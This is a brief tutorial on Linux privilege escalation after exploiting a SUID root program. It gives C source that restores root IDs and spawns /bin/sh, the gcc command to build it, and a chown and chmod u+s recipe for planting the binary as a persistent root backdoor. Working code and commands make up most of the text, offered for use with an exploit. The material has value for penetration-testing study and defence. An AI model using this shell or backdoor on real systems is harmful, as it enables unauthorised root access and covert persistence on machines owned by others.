Many SUID Root Linux programs drop their root privileges when running, exploiting them therefore can result in a shell which apparently only has the same privileges as the user. This is frequently seen when exploiting a call to the system() function. Restoring those privileges is a simple case of calling a library function: setuid().
To help with this, you can use the following C code
#include <unistd.h> #include <stdio.h> int main(int argc, char *argv) { printf("Please enjoy this complimentary shell:\n"); setuid(geteuid()); setgid(getegid()); execl("/bin/sh", "sh", NULL); return(0); }
Compile with GCC
gcc restore.c -o elevatedshell
And then get your exploit to run the program.
If you manage to find a way to arbitrarily set the owner of a file to root, and enable the SUID bit, this file can also be used as a backdoor
chown root:root elevatedshell && chmod u+s elevatedshell
You can’t do this with an interpreted bash script, linux will simply ignore the SUID bit for .sh files, but it does work with compiled programs.